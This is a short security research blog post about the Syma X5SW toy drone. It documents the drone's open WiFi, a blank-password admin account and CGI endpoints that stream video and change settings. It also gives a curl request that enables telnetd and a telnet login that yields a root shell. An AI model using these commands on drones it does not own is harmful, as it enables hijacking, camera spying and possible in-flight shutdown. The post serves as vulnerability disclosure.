Root Shell on your Drone!

Cheap drones such as the Syma X5SW aren’t really designed with security in mind. Anyone can connect to the open WiFi access point that the drone broadcasts, issue requests to the drone’s web server for things like video streaming, setting options, and more.

Syma X5SW

This drone in particular runs a DHCP server and assigns addresses starting at 192.168.1.100, and the drone has the static IP 192.168.1.1. On port 80, it’s running a boa 0.94.14rc21 web server. It has a statically configured admin user, with a blank password. For authenticating requests, the user supplies user=admin and pwd= get parameters.

Android App

As a starting point, I downloaded the APK for the android version of the FPV app. Unzipping the apk, we found the first endpoint for capturing images by running the following command on the app’s dex file:

strings com.tomdxs.symafpv/classes.dex | grep cgi

This yielded a single result: 2http://192.168.1.1:80/snapshot.cgi?user=admin&pwd=, clearly the streaming endpoint we were looking for. Googling this led to much better google results, and gave me access to previous research done on these [and similarly architected] drones, and manufacturers that produce similar cameras:

Known Endpoints

  • GET /videostream.cgi - streaming video
  • GET /snapshot.cgi - take a picture
  • GET /get_params.cgi - get all camera options
  • GET /set_params.cgi - set all camera options, including activation of telnetd!

Obtaining video

We can obtain video in most modern web browsers by GET requesting the videostream page: http://192.168.1.1/videostream.cgi?user=admin&pwd=.

We can obtain still images by making a GET request here: http://192.168.1.1/snapshot.cgi?user=admin&pwd= The images it outputs are relatively low quality. One of the samples we obtained had a size of 640x480, and was 0.307 Megapixels

Root Shell

# To obtain a shell on the device, we run the following `GET` request:
$ curl 'http://192.168.1.1/set_params.cgi?telnetd=1&save=1&reboot=1&user=admin&pwd='

# Once it reboots, we telnet into the box with the `admin` user:
$ telnet -l admin 192.168.1.1

# If all goes successfully, after a few seconds you'll have a shell!
# BusyBox v1.15.2 (2015-07-01 14:40:28 CST) hush - the humble shell

Drone Control

Unfortunately, Unlike the microdrone mentioned in one of the other articles I read, it appears you cannot control the drone via the web interface. The serial ports that it mentions unfortunately don’t exist.

Things to do

  • There’s binaries for powering off the drone, shutting down, etc. Do they work while in-flight?
  • Search for CGI scripts to possibly find other vulnerabilities

Change Log

  • 5/31/2018 - Initial Revision

Found a typo or technical problem? file an issue!